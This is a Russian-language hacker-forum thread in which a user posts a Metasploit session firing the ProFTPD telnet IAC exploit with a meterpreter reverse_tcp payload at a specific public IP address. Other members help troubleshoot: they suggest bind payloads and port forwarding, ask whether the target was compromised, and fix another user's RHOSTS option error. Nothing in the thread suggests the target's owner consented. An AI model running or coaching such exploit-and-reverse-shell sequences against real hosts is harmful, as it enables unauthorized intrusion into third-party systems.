PDA

Просмотр полной версии : Metasploit


nike001
14.03.2014, 01:50
Что не так?


Code:
msf > use linux/ftp/proftp_telnet_iac
msf exploit(proftp_telnet_iac) > set RHOST 213.239.235.179
RHOST => 213.239.235.179
msf exploit(proftp_telnet_iac) > set RPORT 21
RPORT => 21
msf exploit(proftp_telnet_iac) > set TARGET 0
TARGET => 0
msf exploit(proftp_telnet_iac) > set PAYLOAD linux/x86/meterpreter/reverse_tcp PAYLOAD => linux/x86/meterpreter/reverse_tcp
msf exploit(proftp_telnet_iac) > set LHOST 192.168.1.4
LHOST => 192.168.1.4
msf exploit(proftp_telnet_iac) > exploit
Started reverse handler on 192.168.1.4:4444
Automatically detecting the target...
FTP Banner: 220 ProFTPD 1.3.3a Server (Debian) [::ffff:213.239.235.179]
Selected Target: ProFTPD 1.3.3a Server (Debian) - Squeeze Beta1
msf exploit(proftp_telnet_iac) >

И всё((

Unknown
14.03.2014, 02:39
Вам точно нужен reverse-tcp? По возможности используется что-то более прямое.

По вероятности:

1) Целевая версия таки не уязвима

2) Цель уязвима, но не может законнектиться к вам.

nike001
14.03.2014, 09:26
Нет, версия точно уязвима(если не пропатчена конечно,в чем я сомневаюсь), и есть ли спобоб исправить пункт 2?

Спасибо.

Unknown
14.03.2014, 15:24
nike001 said:
Нет, версия точно уязвима(если не пропатчена конечно,в чем я сомневаюсь), и есть ли спобоб исправить пункт 2?
Спасибо.


Судя по баннеру, да, уязвима. Но баннер - это всего лишь баннер.

Насколько я помню, в этом сплойте нет ограничений на тип пейлоада, поэтому используйте любой другой из доступных, где цели не нужно коннектиться к вам.

nike001
14.03.2014, 15:59
madhatter said:
Судя по баннеру, да, уязвима. Но баннер - это всего лишь баннер.
Насколько я помню, в этом сплойте нет ограничений на тип пейлоада, поэтому используйте любой другой из доступных, где цели не нужно коннектиться к вам.


Спасибо. Хоть кто-то здесь разбирается не только в скулях и xss-ках.

Unknown
14.03.2014, 16:07
nike001 said:
Спасибо. Хоть кто-то здесь разбирается не только в скулях и xss-ках.


Np. Так вы расскажите, поломалась цель?

nike001
14.03.2014, 16:23
madhatter said:
Np. Так вы расскажите, поломалась цель?


Сейчас буду пробовать. Позже отпишусь.

nike001
14.03.2014, 16:39
И shell_bind_tcp, и bind_tcp тоже не работают.

P.S. Если есть у кого киньте ссылку про payloads(виды, и для чего каждый служит)

infoseller
15.03.2014, 14:17
А хэндлер-то запущен? и должен быть проброс в локалку...

VY_CMa
15.03.2014, 14:26
За все время ни одного хоста с рабочей багой не попадалось, остается собирать на локалке и проверять. 2ТС, скорее всего патченная.

nike001
15.03.2014, 16:08
infoseller said:
А хэндлер-то запущен? и должен быть проброс в локалку...




Code:
Started reverse handler on 192.168.1.4:4444

Ну на сколько я понимаю хэндлер запущен и проброс в локалку тоже есть.

После того как я запускаю сплойт появляется вот эта строка


Code:
msf exploit(proftp_telnet_iac) >

и консоль зависает, т.е. ничего нельзя ввести, Ctrl+c и Ctrl+x ничего не работает.

nike001
17.03.2014, 23:21
Никто что ли не знает, почему не работает?

Leo2016
27.01.2016, 16:27
madhatter said:
↑ (https://antichat.live/posts/3689660/)
Вам точно нужен reverse-tcp? По возможности используется что-то более прямое.
По вероятности:
1) Целевая версия таки не уязвима
2) Цель уязвима, но не может законнектиться к вам.


Вижу шаришь))Помоги разобраться.Проблема в том что эксплоит требует опцию RHOST в основном это IP но при вводе пишет (Auxiliary failed: Msf::OptionValidateError The following options failed to validate: RHOSTS ) опция RHOST (The target address range or CIDR identifier) cпасиб за ранее.

grimnir
27.01.2016, 21:27
Leo2016 said:
↑ (https://antichat.live/posts/3945709/)
Вижу шаришь))Помоги разобраться.Проблема в том что эксплоит требует опцию RHOST в основном это IP но при вводе пишет (Auxiliary failed: Msf::OptionValidateError The following options failed to validate: RHOSTS ) опция RHOST (The target address range or CIDR identifier) cпасиб за ранее.


Будьте внимательнее в следующий раз , ошибка новичков там написано RHOSTS а не RHOST

http://www.blackmoreops.com/2014/01...-following-options-failed-to-validate-rhosts/ (http://www.blackmoreops.com/2014/01/09/fix-metasploit-error-following-options-failed-to-validate-rhosts/)

Leo2016
27.01.2016, 22:10
grimnir said:
↑ (https://antichat.live/posts/3945827/)
Будьте внимательнее в следующий раз , ошибка новичков там написано RHOST
S а не RHOST
http://www.blackmoreops.com/2014/01...-following-options-failed-to-validate-rhosts/ (http://www.blackmoreops.com/2014/01/09/fix-metasploit-error-following-options-failed-to-validate-rhosts/)


Вот черт спасибо большое)))И правда)))Держи лапу))))

nikbim96
15.02.2016, 04:33
Ты ломаешь его в локальной сети?